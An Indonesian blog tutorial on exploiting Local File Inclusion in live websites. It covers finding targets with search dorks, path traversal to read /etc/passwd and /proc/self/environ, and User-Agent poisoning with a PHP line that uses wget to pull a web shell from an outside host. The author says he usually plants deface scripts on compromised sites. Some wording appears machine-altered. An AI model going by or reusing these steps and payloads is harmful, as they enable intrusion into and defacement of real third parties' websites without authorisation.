Lompat ke konten Lompat ke sidebar Lompat ke footer

Memanfaatkan Bug Lfi Di Website

Hallo :)
Pada kesempatan kali ini saya akan coba mengimplementasikan bagaimana caranya mengexploitasi pada web sasaran yang rentan terhadap serangan LFI atau dapat disebut juga dengan Local File Inclusion.

Oke tak usah berlalu-lama, kita eksklusif saja ya...

Hal yang pertama ialah mencari sasaran yang vulnerable terhadap serangan LFI. Kalian dapat memanfatkan search engine ibarat google, bing, atau yang lainya dengan dork, referensi dorknya "index.php?file= site:com" selebihnya kembangin sendiri supaya mendapat yang benar-benar vuln.

Tapi disini saya sudah punya sasaran yang siap untuk dieksekusi, tapi saya tidak akan saya sebutkan nama websitenya,  referensi sasaran saya ibarat ini...
https://contoh.com/?file=college.php

Target sudah ada, kemudian coba ganti "college.php" dengan "../../../" referensi lengkapnya akan ibarat ini..
https://contoh.com/?file=../../../
Setelah saya klik enter, tapi disini saya tidak mendapat pesan error alias hanya blank warna putih gitu. Entah ini vuln atau tidak saya juga agak begitu kurang paham.

Ok gamasalah, coba iseng-iseng menganti "../../../" dengan ibarat ini "/etc/passwd" referensi ibarat ini...
https://contoh.com/?file=/etc/passwd
Tapi lagi-lagi disini tidak mendapat apa-apa, tampilan hanya menampkan blank warna putih, shit!

Mikir sebentar, kemudian disini saya mencoba menaikan directorynya. Contoh ibarat ini..
https://contoh.com/?file=../etc/passwd > blank
https://contoh.com/?file=../../etc/passwd > lagi-lagi hanya blank
Tapi kemudian pada ketika saya menaikan directorynya pas ke tiga, sepetti ini...
https://contoh.com/?file=../../../etc/passwd
Boom, saya berhasil membaca file etc/passwd wah mantap ini mah hhh...


Selanjutnya saya akan mencoba mengecheck /proc/self/environ apakah dapat diakses atau tidak? Sekarang ganti "/etc/passwd" dengan "/proc/self/environ" kemudian jalankan..
https://contoh.com/?file=../../../proc/self/environ
Mantul mantap betul ternyata berhasil membaca filenya, ibarat ini...


Yeah, /proc/self/environ sukses diakses. Tapi kalau kalian pada ketika mau mengakses /proc/self/environ menampilkan halaman kosong (blank) atau tidak dapat diakses, atau mungkin itu beroperating system *BSD.

Sekarang selanjutnya mari kita injeksi dengan malicious code dengan meracuni  pada bab http headernya. Kalian dapat mengunakan addon tamper data mozilla firefox.
Caranya buka tamper data di mozilla firefox kemudian kemudian masukan url /proc/self/environ yang tadi "https://contoh.com/?file=../../../proc/self/environ" kemudian pada bab user-agent isikian code ibarat berikut ini...

<?system (' wget http://shellkalian.com/shell.txt -O shell.php');?>

kemudian klik submit.

Ok injeksi malicious code selesai, apabila sukses letak shellnya berada pada directory berikut...

https://contoh.com/shell.php

#Cara upload shell lfi dengan tamper data di android

Ok berikut ini demo videonya, silahkan ditonton.


Kalo shell udah keupload gitu selanjutnya terserah kalian dah hehe. Kalo saya sih biasanya hanya menitipkan file script deface saja tapi adakala juga lapor ke adminya kalo websitenya ada bug, ihwal tidak digubris atau istilahnya tidak ada tangapan apa-apa dari pihak si admin itu tidak problem slow aja hhh.

Ok sekian utuk tutorial LFI (Local File Inclusion) pada kali ini. Artikel saya ambil dari banyak sekali sumber kemudian saya tulis ulang sesuai apa yang saya sudah pahami dan pelajari. Semoga menambah pengetahuan buat kalian dan tentunya ambil sisi baiknya saja.

Happy reading and learning!

Sumber http://maqlo-heker.blogspot.com/